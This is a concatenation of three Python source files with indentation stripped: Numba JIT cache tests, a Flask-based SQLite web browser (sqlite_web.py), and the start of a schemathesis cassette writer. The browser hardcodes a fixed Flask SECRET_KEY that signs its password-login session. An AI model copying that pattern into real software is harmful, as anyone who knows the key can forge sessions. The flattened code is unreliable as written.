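        return x + y
    return cached_add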
class TestCache(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
@tag('important')
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertEqual(str(w[0].message),
'Cannot cache compiled function "looplifted" '
'as it uses lifted loops')
def test_big_array(self):
# Code referencing big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_c_sin
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_c_sin"',
str(w[0].message))
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
# Functions with the same name should still disambiguate
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertEqual(err.strip(), "cache hits = 1")
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
if __name__ == '__main__':
unittest.main()
|
sqlite_web.py
|
#!/usr/bin/env python
import datetime
import math
import operator
import optparse
import os
import re
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
from io import TextIOWrapper
# Py2k compat.
if sys.version_info[0] == 2:
PY2 = True
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
else:
PY2 = False
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version <= (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
'Please update by running pip install --upgrade '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import sqlite3
from playhouse.dataset import DataSet
from playhouse.migrate import migrate
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
app = Flask(
__name__,
static_folder=os.path.join(CUR_DIR, 'static'),
template_folder=os.path.join(CUR_DIR, 'templates'))
app.config.from_object(__name__)
dataset = None
migrator = None
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
db_file = dataset._database.database
if db_file.startswith('file:'):
db_file = db_file[5:]
return os.path.realpath(db_file.rsplit('?', 1)[0])
@property
def is_readonly(self):
db_file = dataset._database.database
return db_file.endswith('?mode=ro')
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html', sqlite=sqlite3)
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
if request.form.get('password') == app.config['PASSWORD']:
session['authorized'] = True
return redirect(session.get('next_url') or url_for('index'))
flash('The password you entered is incorrect.', 'danger')
return render_template('login.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
@app.route('/create-table/', methods=['POST'])
def table_create():
table = (request.form.get('table_name') or '').strip()
if not table:
flash('Table name is required.', 'danger')
return redirect(request.form.get('redirect') or url_for('index'))
dataset[table]
return redirect(url_for('table_import', table=table))
@app.route('/<table>/')
@require_table
def table_structure(table):
ds_table = dataset[table]
model_class = ds_table.model_class
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_structure.html',
columns=dataset.get_columns(table),
ds_table=ds_table,
foreign_keys=dataset.get_foreign_keys(table),
indexes=dataset.get_indexes(table),
model_class=model_class,
table=table,
table_sql=table_sql,
triggers=dataset.get_triggers(table))
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/<table>/add-column/', methods=['GET', 'POST'])
@require_table
def add_column(table):
column_mapping = OrderedDict((
('VARCHAR', CharField),
('TEXT', TextField),
('INTEGER', IntegerField),
('REAL', FloatField),
('BOOL', BooleanField),
('BLOB', BlobField),
('DATETIME', DateTimeField),
('DATE', DateField),
('TIME', TimeField),
('DECIMAL', DecimalField)))
request_data = get_request_data()
col_type = request_data.get('type')
name = request_data.get('name', '')
if request.method == 'POST':
if name and col_type in column_mapping:
migrate(
migrator.add_column(
table,
name,
column_mapping[col_type](null=True)))
flash('Column "%s" was added successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name and column type are required.', 'danger')
return render_template(
'add_column.html',
col_type=col_type,
column_mapping=column_mapping,
name=name,
table=table)
@app.route('/<table>/drop-column/', methods=['GET', 'POST'])
@require_table
def drop_column(table):
request_data = get_request_data()
name = request_data.get('name', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if name in column_names:
migrate(migrator.drop_column(table, name))
flash('Column "%s" was dropped successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name is required.', 'danger')
return render_template(
'drop_column.html',
columns=columns,
column_names=column_names,
name=name,
table=table)
@app.route('/<table>/rename-column/', methods=['GET', 'POST'])
@require_table
def rename_column(table):
request_data = get_request_data()
rename = request_data.get('rename', '')
rename_to = request_data.get('rename_to', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if (rename in column_names) and (rename_to not in column_names):
migrate(migrator.rename_column(table, rename, rename_to))
flash('Column "%s" was renamed successfully!' % rename, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Column name is required and cannot conflict with an '
'existing column\'s name.', 'danger')
return render_template(
'rename_column.html',
columns=columns,
column_names=column_names,
rename=rename,
rename_to=rename_to,
table=table)
@app.route('/<table>/add-index/', methods=['GET', 'POST'])
@require_table
def add_index(table):
request_data = get_request_data()
indexed_columns = request_data.getlist('indexed_columns')
unique = bool(request_data.get('unique'))
columns = dataset.get_columns(table)
if request.method == 'POST':
if indexed_columns:
migrate(
migrator.add_index(
table,
indexed_columns,
unique))
flash('Index created successfully.', 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('One or more columns must be selected.', 'danger')
return render_template(
'add_index.html',
columns=columns,
indexed_columns=indexed_columns,
table=table,
unique=unique)
@app.route('/<table>/drop-index/', methods=['GET', 'POST'])
@require_table
def drop_index(table):
request_data = get_request_data()
name = request_data.get('name', '')
indexes = dataset.get_indexes(table)
index_names = [index.name for index in indexes]
if request.method == 'POST':
if name in index_names:
migrate(migrator.drop_index(table, name))
flash('Index "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Index name is required.', 'danger')
return render_template(
'drop_index.html',
indexes=indexes,
index_names=index_names,
name=name,
table=table)
@app.route('/<table>/drop-trigger/', methods=['GET', 'POST'])
@require_table
def drop_trigger(table):
request_data = get_request_data()
name = request_data.get('name', '')
triggers = dataset.get_triggers(table)
trigger_names = [trigger.name for trigger in triggers]
if request.method == 'POST':
if name in trigger_names:
dataset.query('DROP TRIGGER "%s";' % name)
flash('Trigger "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Trigger name is required.', 'danger')
return render_template(
'drop_trigger.html',
triggers=triggers,
trigger_names=trigger_names,
name=name,
table=table)
@app.route('/<table>/content/')
@require_table
def table_content(table):
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
total_rows = ds_table.all().count()
rows_per_page = app.config['ROWS_PER_PAGE']
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = ds_table.all().paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_content.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
table=table,
total_pages=total_pages,
total_rows=total_rows)
@app.route('/<table>/query/', methods=['GET', 'POST'])
@require_table
def table_query(table):
data = []
data_description = error = row_count = sql = None
if request.method == 'POST':
sql = request.form['sql']
if 'export_json' in request.form:
return export(table, sql, 'json')
elif 'export_csv' in request.form:
return export(table, sql, 'csv')
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
if request.args.get('sql'):
sql = request.args.get('sql')
else:
sql = 'SELECT *\nFROM "%s"' % (table)
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_query.html',
data=data,
data_description=data_description,
error=error,
query_images=get_query_images(),
row_count=row_count,
sql=sql,
table=table,
table_sql=table_sql)
@app.route('/table-definition/', methods=['POST'])
def set_table_definition_preference():
key = 'show'
show = False
if request.form.get(key) and request.form.get(key) != 'false':
session[key] = show = True
elif key in session:
del session[key]
return jsonify({key: show})
def export(table, sql, export_format):
model_class = dataset[table].model_class
query = model_class.raw(sql).dicts()
buf = StringIO()
if export_format == 'json':
kwargs = {'indent': 2}
filename = '%s-export.json' % table
mimetype = 'text/javascript'
else:
kwargs = {}
filename = '%s-export.csv' % table
mimetype = 'text/csv'
dataset.freeze(query, export_format, file_obj=buf, **kwargs)
response_data = buf.getvalue()
response = make_response(response_data)
response.headers['Content-Length'] = len(response_data)
response.headers['Content-Type'] = mimetype
response.headers['Content-Disposition'] = 'attachment; filename=%s' % (
filename)
response.headers['Expires'] = 0
response.headers['Pragma'] = 'public'
return response
@app.route('/<table>/import/', methods=['GET', 'POST'])
@require_table
def table_import(table):
count = None
request_data = get_request_data()
strict = bool(request_data.get('strict'))
if request.method == 'POST':
file_obj = request.files.get('file')
if not file_obj:
flash('Please select an import file.', 'danger')
elif not file_obj.filename.lower().endswith(('.csv', '.json')):
flash('Unsupported file-type. Must be a .json or .csv file.',
'danger')
else:
if file_obj.filename.lower().endswith('.json'):
format = 'json'
else:
format = 'csv'
# Here we need to translate the file stream. Werkzeug uses a
# spooled temporary file opened in wb+ mode, which is not
# compatible with Python's CSV module. We'd need to reach pretty
# far into Flask's internals to modify this behavior, so instead
# we'll just translate the stream into utf8-decoded unicode.
if not PY2:
try:
stream = TextIOWrapper(file_obj, encoding='utf-8-sig')
except AttributeError:
# The SpooledTemporaryFile used by werkzeug does not
# implement an API that the TextIOWrapper expects, so we'll
# just consume the whole damn thing and decode it.
# Fixed in werkzeug 0.15.
stream = StringIO(file_obj.read().decode('utf-8-sig'))
else:
stream = file_obj.stream
try:
with dataset.transaction():
count = dataset.thaw(
table,
format=format,
file_obj=stream,
strict=strict)
except Exception as exc:
flash('Error importing file: %s' % exc, 'danger')
else:
flash(
'Successfully imported %s objects from %s.' % (
count, file_obj.filename),
'success')
return redirect(url_for('table_content', table=table))
return render_template(
'table_import.html',
count=count,
strict=strict,
table=table)
@app.route('/<table>/drop/', methods=['GET', 'POST'])
@require_table
def drop_table(table):
if request.method == 'POST':
model_class = dataset[table].model_class
model_class.drop_table()
dataset.update_cache() # Update all tables.
flash('Table "%s" dropped successfully.' % table, 'success')
return redirect(url_for('index'))
return render_template('drop_table.html', table=table)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50):
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
column_re = re.compile(r'(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': bool(app.config.get('PASSWORD')),
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
class PrefixMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = '/%s' % prefix.strip('/')
self.prefix_len = len(self.prefix)
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][self.prefix_len:]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['URL does not match application prefix.'.encode()]
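# Used by initialize_app() below: when a --url-prefix is supplied, the app is
# wrapped via app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix=url_prefix).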
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=8080,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
parser.add_option(
'-x',
'--no-browser',
action='store_false',
default=True,
dest='browser',
help='Do not automatically open browser page.')
parser.add_option(
'-P',
'--password',
action='store_true',
dest='prompt_password',
help='Prompt for password to access database browser.')
parser.add_option(
'-r',
'--read-only',
action='store_true',
dest='read_only',
help='Open database in read-only mode.')
parser.add_option(
'-u',
'--url-prefix',
dest='url_prefix',
help='URL prefix for application.')
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
def install_auth_handler(password):
app.config['PASSWORD'] = password
@app.before_request
def check_password():
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('You must log-in to view the database browser.', 'danger')
session['next_url'] = request.base_url
return redirect(url_for('login'))
def initialize_app(filename, read_only=False, password=None, url_prefix=None):
global dataset
global migrator
if password:
install_auth_handler(password)
if read_only:
if sys.version_info < (3, 4, 0):
die('Python 3.4.0 or newer is required for read-only access.')
if peewee_version < (3, 5, 1):
die('Peewee 3.5.1 or newer is required for read-only access.')
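# SQLite URI filenames ('file:...?mode=ro') give a genuinely read-only connection;
# peewee needs uri=True to pass the URI through unchanged.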
db = SqliteDatabase('file:%s?mode=ro' % filename, uri=True)
try:
db.connect()
except OperationalError:
die('Unable to open database file in read-only mode. Ensure that '
'the database exists in order to use read-only mode.')
db.close()
dataset = SqliteDataSet(db, bare_fields=True)
else:
dataset = SqliteDataSet('sqlite:///%s' % filename, bare_fields=True)
if url_prefix:
app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix=url_prefix)
migrator = dataset._migrator
dataset.close()
def main():
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not args:
die('Error: missing required path to database file.')
password = None
if options.prompt_password:
if os.environ.get('SQLITE_WEB_PASSWORD'):
password = os.environ['SQLITE_WEB_PASSWORD']
else:
while True:
password = getpass('Enter password: ')
password_confirm = getpass('Confirm password: ')
if password != password_confirm:
print('Passwords did not match!')
else:
break
# Initialize the dataset instance and (optionally) authentication handler.
initialize_app(args[0], options.read_only, password, options.url_prefix)
if options.browser:
open_browser_tab(options.host, options.port)
app.run(host=options.host, port=options.port, debug=options.debug)
if __name__ == '__main__':
main()
|
cassettes.py
|
import base64
import json
import re
import sys
import threading
from queue import Queue
from typing import Any, Dict, Generator, Iterator, List, Optional, cast
import attr
import click
import requests
from requests.cookies import RequestsCookieJar
from requests.structures import CaseInsensitiveDict
from .. import constants
from ..models import Request, Response
from ..runner import events
from ..runner.serialization import SerializedCheck, SerializedInteraction
from ..types import RequestCert
from .context import ExecutionContext
from .handlers import EventHandler
# Wait until the worker terminates
WRITER_WORKER_JOIN_TIMEOUT = 1
@attr.s(slots=True) # pragma: no mutate
class CassetteWriter(EventHandler):
"""Write interactions in a YAML cassette.
A low-level interface is used to write data to the YAML file during the test run, which reduces the delay at
the end of the test run.
"""
file_handle: click.utils.LazyFile = attr.ib() # pragma: no mutate
queue: Queue = attr.ib(factory=Queue) # pragma: no mutate
worker: threading.Thread = attr.ib(init=False) # pragma: no mutate
def __attrs_post_init__(self) -> None:
